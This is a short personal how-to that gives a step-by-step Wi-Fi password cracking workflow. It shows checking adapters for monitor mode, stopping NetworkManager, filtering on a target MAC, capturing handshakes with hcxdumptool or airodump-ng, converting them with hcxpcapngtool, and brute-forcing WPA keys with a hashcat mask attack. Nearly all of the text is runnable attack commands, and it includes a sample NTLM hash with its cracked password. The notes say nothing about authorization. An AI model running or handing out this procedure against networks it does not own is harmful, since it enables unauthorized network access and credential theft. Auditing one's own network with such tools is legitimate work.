Windows: netsh wlan show wirelesscapabilities
in admin cmd shell, look for Network monitor mode
.
Linux: iw list | grep -Fe "Supported interface modes" -n10
, look for * monitor
in section Supported interface modes:
.
I boot a live Kali 2024.1 on a 8G USB stick on a Acer ES1-531-P8NJ and install hcxdumptool
and hcxtools
from the official repo.
The version of hcxdumptool
from the repo is 6.3.1
as of 20240420.
sudo systemctl stop NetworkManager
sudo systemctl stop wpa_supplicant
iwconfig
iw list
sudo tcpdump -i wlan0 wlan addr3 TA:RG:ET:__:_M:AC -ddd > attack.bpf
See also: ZerBea/hcxdumptool#420
The --bpfc option is not presented in v6.3.1.
sudo hcxdumptool -i wlan0 -w dumpfile.pcapng --rds=1 --bpf=attack.bpf
Replace wlan
with your Wifi interface name. Add -c 1a
for looking at channel 1 only.
hcxpcapngtool ./dumpfile.pcapng -o test.hc22000
hcxhashtool -i test.hc22000 --info=stdout
hashcat --hwmon-disable -m22000 -a3 -i -1 ?l?u?d .\test.hc22000 "?1?1?1?1?1?1?1?1?1?1?1?1"
I transferred the hc22000 file to my Windows PC and use hashcat (v6.2.6) to crack it.
hcxdumptool
does not work on the internal Wifi of Rasp Pi 4b.- Hashcat test:
hashcat -m1000 -a3 -i 42EF98F2E9B77304716D2AECA2F0BD96 ?a?a?a?a?a?a?a
, the password should be*H4cK*
. - Packet capturing with
airodump-ng
seems to work on Rasp Pi 4b. Commands aresudo airodump-ng wlan0mon -c 13 --bssid TA:RG:ET:__:_M:AC -w dumpfile
andhcxpcapngtool dumpfile.cap -o test.hc22000